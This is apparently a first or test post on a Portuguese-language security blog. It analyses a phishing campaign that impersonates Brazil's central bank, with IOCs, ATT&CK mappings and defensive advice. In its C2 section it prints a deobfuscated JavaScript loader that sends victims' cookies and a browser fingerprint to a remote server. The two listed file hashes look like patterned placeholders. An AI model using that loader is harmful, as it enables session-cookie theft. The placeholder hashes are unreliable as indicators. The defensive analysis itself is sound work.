Sinais
teste10 de fevereiro de 20262 min de leitura

Primeiro Post

Análise técnica de uma campanha de phishing direcionada ao setor financeiro brasileiro, revelando TTPs, infraestrutura e indicadores de comprometimento.

Em janeiro de 2026, identificamos uma campanha sofisticada de phishing direcionada a instituições financeiras brasileiras. Este relatório detalha a análise técnica da operação, desde o vetor inicial até os mecanismos de persistência e exfiltração de dados.

Contexto e Descoberta

A campanha foi detectada inicialmente através de alertas de e-mail suspeito reportados por colaboradores de três bancos distintos. A análise preliminar revelou padrões consistentes de infraestrutura que sugeriam uma operação coordenada.

O vetor de ataque utilizava e-mails que simulavam comunicações legítimas do Banco Central do Brasil, explorando a urgência regulatória como pretexto para induzir as vítimas a acessarem páginas maliciosas.

Análise Técnica

Vetor de Entrada

Os e-mails de phishing apresentavam as seguintes características:

  • Remetente falsificado com domínio similar ao oficial (bcb-gov[.]br)

  • Assunto referenciando "Circular BACEN - Ação Imediata Requerida"

  • Anexo em formato HTML com JavaScript ofuscado

  • Links encurtados apontando para infraestrutura comprometida

Infraestrutura de Comando e Controle

A análise da infraestrutura revelou uma rede de servidores distribuídos geograficamente, utilizando técnicas de fast-flux DNS para dificultar o takedown. O código malicioso realizava as seguintes operações:

// Snippet deobfuscado do loader
const c2 = atob("aHR0cHM6Ly9hcGkuZmluLXNlY3VyZS5jb20=");
fetch(c2 + "/beacon", {
  method: "POST",
  body: JSON.stringify({
    uid: fingerprint(),
    env: navigator.userAgent,
    cookies: document.cookie
  })
});

Indicadores de Comprometimento

Durante a investigação, coletamos os seguintes IOCs que podem ser utilizados para detecção e bloqueio:

Domínios Maliciosos

  • bcb-gov[.]br

  • api.fin-secure[.]com

  • cdn.banking-update[.]net

  • portal-bacen[.]com

Hashes de Arquivos

  • SHA256: a7f3e2d1c4b5a6f7e8d9c0b1a2f3e4d5c6b7a8f9e0d1c2b3a4f5e6d7c8b9a0f1

  • SHA256: b8e4f3c2d5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2

TTPs Mapeados (MITRE ATT&CK)

A campanha utiliza as seguintes táticas e técnicas:

  • T1566.001 - Spearphishing Attachment

  • T1204.002 - User Execution: Malicious File

  • T1539 - Steal Web Session Cookie

  • T1041 - Exfiltration Over C2 Channel

Recomendações

  1. Bloqueio imediato dos IOCs listados em firewalls e proxies

  2. Revisão de logs de e-mail para identificar possíveis vítimas

  3. Atualização das regras de detecção de phishing

  4. Treinamento de conscientização para colaboradores

A velocidade de detecção e resposta é crucial. Campanhas como esta têm janela de operação limitada antes que a infraestrutura seja abandonada pelos atacantes.

Conclusão

Esta campanha demonstra a crescente sofisticação dos ataques direcionados ao setor financeiro brasileiro. A combinação de engenharia social refinada com infraestrutura técnica robusta indica um ator de ameaça com recursos significativos e conhecimento do contexto regulatório local.

Continuaremos monitorando a evolução desta campanha e atualizaremos este relatório conforme novas informações forem identificadas.